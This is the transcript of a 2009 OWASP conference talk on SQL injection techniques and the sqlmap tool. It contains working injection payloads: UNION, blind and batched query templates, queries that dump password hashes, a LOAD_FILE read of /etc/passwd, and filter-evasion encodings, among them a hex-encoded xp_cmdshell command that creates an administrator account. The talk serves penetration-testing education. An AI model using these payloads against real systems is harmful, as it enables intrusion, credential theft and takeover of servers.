SQL injection: Not only AND 1=1

SQL injection: Not only AND 1=1 Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd bernardo.damele@gmail.com +44 7788962949 Copyright © Bernardo Damele Assumpcao Guimaraes Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org

Introduction From the OWASP Testing Guide: “SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands” A long list of resources can be found on my delicious profile, http://delicious.com/inquis/sqlinjection Front Range OWASP Conference, Denver (USA) March 5, 2009 2

How does it work? Detection of a possible SQL injection flaw Back-end database management system fingerprint SQL injection vulnerability can lead to: DBMS data exfiltration and manipulation File system read and write access Operating system control Front Range OWASP Conference, Denver (USA) March 5, 2009 3

sqlmap – http://sqlmap.sourceforge.net Open source command-line automatic tool Detect and exploit SQL injection flaws in web applications Developed in Python since July 2006 Released under GPLv2 Front Range OWASP Conference, Denver (USA) March 5, 2009 4

sqlmap key features Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server Three SQL injection techniques: Boolean-based blind UNION query Batched queries Targets: from user, by parsing WebScarab/Burp proxies log files, by Google dorking Front Range OWASP Conference, Denver (USA) March 5, 2009 5

sqlmap key features Perform an extensive back-end DBMS fingerprint Enumerate users, password hashes, privileges, databases, tables, columns and their data-type Dump entire or user specified database table entries Run custom SQL statements Front Range OWASP Conference, Denver (USA) March 5, 2009 6

Database management system fingerprint sqlmap implements up to four techniques: Inband error messages Banner (version(), @@version, …) parsing SQL dialect Specific functions static output comparison Front Range OWASP Conference, Denver (USA) March 5, 2009 7

Database management system fingerprint Example of basic back-end DBMS fingerprint on Oracle 10g Express Edition: Two techniques: Specific variables Specific functions static output comparison The two possible queries to fingerprint it are: AND ROWNUM=ROWNUM AND LENGTH(SYSDATE)=LENGTH(SYSDATE) Front Range OWASP Conference, Denver (USA) March 5, 2009 8

Database management system fingerprint Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005: Three techniques: Active fingerprint: Microsoft SQL Server 2005 Banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399 HTML error message fingerprint: Microsoft SQL Server Active fingerprint refers to specific functions’ static output comparison in this example Front Range OWASP Conference, Denver (USA) March 5, 2009 9

Database management system fingerprint Examples of SQL dialect fingerprint: On MySQL: /*!50067 AND 47=47 */ On PostgreSQL: AND 82::int=82 Front Range OWASP Conference, Denver (USA) March 5, 2009 10

More on fingerprint Fingerprinting is a key step in penetration testing It is not only about back-end DBMS software There are techniques and tools to fingerprint the web server, the web application technology and their underlying system What about the back-end DBMS underlying operating system? Front Range OWASP Conference, Denver (USA) March 5, 2009 11

More on fingerprint sqlmap can fingerprint them without making extra requests: Web/application server and web application technology: by parsing the HTTP response headers Known basic technique Back-end DBMS operating system: by parsing the DBMS banner Over-looked technique Front Range OWASP Conference, Denver (USA) March 5, 2009 12

SQL statement syntax Identify the web application query syntax is mandatory It is needed to correctly exploit the flaw Example: id, user FROM users WHERE id LIKE quot;SELECT ((('%quot; . $_GET['id'] . quot;%'))) LIMIT 0, 1quot; Front Range OWASP Conference, Denver (USA) March 5, 2009 13

SQL statement syntax Possible exploitation vector: page.php?id=1'))) AND ((('RaNd' LIKE 'RaNd For a boolean-based blind SQL injection exploit: 1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd Front Range OWASP Conference, Denver (USA) March 5, 2009 14

SQL statement syntax For a UNION query SQL injection exploit: 1'))) UNION ALL SELECT NULL, Concatenated SQL query# AND ((('RaNd' LIKE 'RaNd For a batched query SQL injection exploit: 1'))); SQL query;# AND ((('RaNd' LIKE 'RaNd Front Range OWASP Conference, Denver (USA) March 5, 2009 15

Bypass number of columns limitation You’ve got a SQL injection point vulnerable to UNION query technique detected by: ORDER BY clause brute-forcing NULL brute-forcing Sequential number brute-forcing The number of columns in the SELECT statement is fewer than the number of columns that you want to inject Front Range OWASP Conference, Denver (USA) March 5, 2009 16

Bypass number of columns limitation Concatenate your SELECT statement columns with random delimiters in a single output Example: The original SELECT statement has only one column Back-end DBMS is PostgreSQL 8.3 We want to retrieve users’ password hashes Front Range OWASP Conference, Denver (USA) March 5, 2009 17

Bypass number of columns limitation SELECT usename, passwd FROM pg_shadow ↓ UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR (68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR( 121)||CHR(66)||CHR(109)||COALESCE(CAST(pas swd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR (103)||CHR(107)||CHR(90), FROM pg_shadow-- Front Range OWASP Conference, Denver (USA) March 5, 2009 18

Single entry UNION query SQL injection You’ve got a parameter vulnerable to UNION query SQL injection The page displays only the query’s first entry output Change the parameter value to its negative value or append a false AND condition to the original parameter value Cause the original query to produce no output Front Range OWASP Conference, Denver (USA) March 5, 2009 19

Single entry UNION query SQL injection Inspect and unpack the SQL injection statement: Calculate its output number of entries Limit it to return one entry at a time Repeat the previous action N times where N is the number of output entries Front Range OWASP Conference, Denver (USA) March 5, 2009 20

Single entry UNION query SQL injection Example on MySQL 4.1 to enumerate the list of databases: SELECT db FROM mysql.db ↓ SELECT … WHERE id=1 AND 3=2 UNION ALL SELECT CONCAT(CHAR(100,84,71,69,87,98),IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)) FROM mysql.db LIMIT Nth, 1# AND 6972=6972 Front Range OWASP Conference, Denver (USA) March 5, 2009 21

Single entry UNION query SQL injection Another technique consists of retrieving entries as a single string Example on MySQL 5.0: SELECT user, password FROM mysql.user ↓ SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user Front Range OWASP Conference, Denver (USA) March 5, 2009 22

Getting a SQL shell sqlmap has options to enumerate / dump different types of data from the back-end DBMS It also allows the user to run custom SQL queries It inspects the provided statement: SELECT: it goes blind or UNION query to retrieve the output DDL, DML, etc: it goes batched query to run it Front Range OWASP Conference, Denver (USA) March 5, 2009 23

SQL injection: Not only WHERE clause Most of the SQL injections occur within the WHERE clause, but GROUP BY, ORDER BY and LIMIT can also be affected SQL injection within these clauses can be exploited to perform a blind injection or, in some cases a UNION query injection In all cases batched query injection is possible Front Range OWASP Conference, Denver (USA) March 5, 2009 24

SQL injection in GROUP BY clause Example on MySQL 5.0: quot;SELECT id, name FROM users GROUP BY quot; . $_GET['id'] ↓ SELECT id, name FROM users GROUP BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)) Front Range OWASP Conference, Denver (USA) March 5, 2009 25

SQL injection in ORDER BY clause Example on PostgreSQL 8.2: quot;SELECT id, name FROM users ORDER BY quot; . $_GET['id'] ↓ SELECT id, name FROM users ORDER BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1/0 END)) Front Range OWASP Conference, Denver (USA) March 5, 2009 26

SQL injection in LIMIT clause Example on MySQL 6.0: quot;SELECT id, name FROM users LIMIT 0, quot; . $_GET['id'] ↓ SELECT id, name FROM users LIMIT 0, 1 UNION ALL SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END), NULL Front Range OWASP Conference, Denver (USA) March 5, 2009 27

SQL injection payloads to bypass filters There are numerous techniques to bypass: Web application language security settings Web application firewalls Intrusion [Detection|Prevention] Systems Web server security settings These techniques can be combined Front Range OWASP Conference, Denver (USA) March 5, 2009 28

PHP Magic Quotes misuse: Bypass You’ve a SQL injection point in a GET, POST parameter or Cookie value Web application language is PHP magic_quotes_gpc setting is On Back-end DBMS is either Microsoft SQL Server or Oracle Their escaping character for single quote is single quote Front Range OWASP Conference, Denver (USA) March 5, 2009 29

PHP Magic Quotes misuse: Bypass Original statement: quot;SELECT name, surname FROM users WHERE name='quot; . $_GET['name'] . quot;'quot; Example of a successful exploit: foobar' OR 10>4-- Query passed by PHP to the back-end DBMS: SELECT name, surname FROM users WHERE name='foobar' OR 10>4--' Front Range OWASP Conference, Denver (USA) March 5, 2009 30

PHP Magic Quotes misuse: Bypass For a UNION query SQL injection exploit: SELECT name, surname FROM users WHERE name='foobar' UNION ALL SELECT NAME, PASSWORD FROM SYS.USER$--' For a boolean-based blind SQL injection exploit: SELECT name, surname FROM users WHERE name='foobar' OR ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number--' Front Range OWASP Conference, Denver (USA) March 5, 2009 31

PHP Magic Quotes bypass: Avoid single quotes Example on MySQL: LOAD_FILE('/etc/passwd') ↓ LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100)) or LOAD_FILE(0x2f6574632f706173737764) It is not limited to bypass only PHP Magic Quotes Front Range OWASP Conference, Denver (USA) March 5, 2009 32

Bypass with percentage char on ASP ASP ignores % if not followed by a valid pair of characters Example on ASP with back-end DBMS PostgreSQL: SELECT pg_sleep(3) ↓ S%ELEC%T %p%g_sle%ep(%3) Front Range OWASP Conference, Denver (USA) March 5, 2009 33

Bypass by hex-encoding the SQL statement Example on Microsoft SQL Server: exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD' ↓ DECLARE @rand varchar(8000) SET @rand = 0x65786563206d61737465722e2e78705f636d6473 68656c6c20274e45542055534552206d7975736572 206d7970617373202f4144442026204e4554204c4f 43414c47524f55502041646d696e6973747261746f 7273206d7975736572202f41444427; EXEC (@rand) Front Range OWASP Conference, Denver (USA) March 5, 2009 34

Bypass by comments as separators Example on MySQL: SELECT user, password FROM mysql.user ↓ SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysq l.user Front Range OWASP Conference, Denver (USA) March 5, 2009 35

Bypass by random mixed case payload Example on Oracle 10g: SELECT banner FROM v$version WHERE ROWNUM=1 ↓ SeLEcT BaNneR FroM v$vERsIon WhERe ROwNUm=1 Front Range OWASP Conference, Denver (USA) March 5, 2009 36

Bypass by random URI encoded payload Example on PostgreSQL: SELECT schemaname FROM pg_tables ↓ %53E%4c%45%43T%20%73%63h%65%6d%61%6e a%6de%20%46%52O%4d%20%70g%5f%74a%62% 6ce%73 Front Range OWASP Conference, Denver (USA) March 5, 2009 37

Credits Chip Andrews, www.sqlsecurity.com Daniele Bellucci, daniele.bellucci.googlepages.com David Campbell, www.owasp.org Kieran Combes Alberto Revelli, sqlninja.sourceforge.net Sumit Siddharth, www.notsosecure.com Alessandro Tanasi, lab.lonerunners.net Front Range OWASP Conference, Denver (USA) March 5, 2009 38

Questions? Thanks for your attention! Front Range OWASP Conference, Denver (USA) March 5, 2009 39

http://bernardodamele.blogspot.com	332
http://people.rit.edu	282
http://sqlinjections.blogspot.com	200
http://www.slideshare.net	197
http://www.pcsec.org	169
http://amxking.bokee.com	19
http://www.daxigua.com	18
http://www.scoop.it	11
http://bernardodamele.blogspot.in	10
http://sqlinjections.blogspot.in	9
http://4ppsecurity.blogspot.com	8
http://static.slideshare.net	5
http://bernardodamele.blogspot.co.uk	5
http://sqlinjections.blogspot.fr	4
http://translate.googleusercontent.com	4
http://sqlinjections.blogspot.mx	3
http://bernardodamele.blogspot.com.br	3
http://bernardodamele.blogspot.se	2
http://bernardodamele.blogspot.pt	2
http://sqlinjections.blogspot.hu	2
http://bernardodamele.blogspot.fr	2
http://sqlinjections.blogspot.be	2
http://bernardodamele.blogspot.kr	2
http://bernardodamele.blogspot.com.es	2
https://people.rit.edu	2
http://bernardodamele.blogspot.it	2
http://bernardodamele.blogspot.de	2
http://webcache.googleusercontent.com	2
http://sqlinjections.blogspot.com.au	2
http://sqlinjections.blogspot.co.at	1
http://209.85.171.132	1
http://sqlinjections.blogspot.co.uk	1
http://sqlinjections.blogspot.jp	1
http://209.85.135.132	1
http://bernardodamele.blogspot.ch	1
http://bernardodamele.blogspot.ca	1
file://	1
http://www.hanrss.com	1
http://www.linkedin.com	1
http://static.slidesharecdn.com	1
http://sqlinjections.blogspot.com.br	1
http://nicecomputersecurity.blogspot.com	1
http://after-school-activitiesz.blogspot.com	1
http://paper.li	1
http://4ppsecurity.blogspot.in	1
http://sqlinjections.blogspot.kr	1
http://feeds2.feedburner.com	1
http://74.125.93.132	1
http://bernardodamele.blogspot.mx	1
http://bernardodamele.blogspot.hu	1
http://pinterest.com	1

SQL injection: Not only AND 1=1

by Bernardo Damele A. G. on Mar 10, 2009

Accessibility

Categories

Upload Details

Usage Rights

52 Embeds 1,326

Statistics

SQL injection: Not only AND 1=1 Presentation Transcript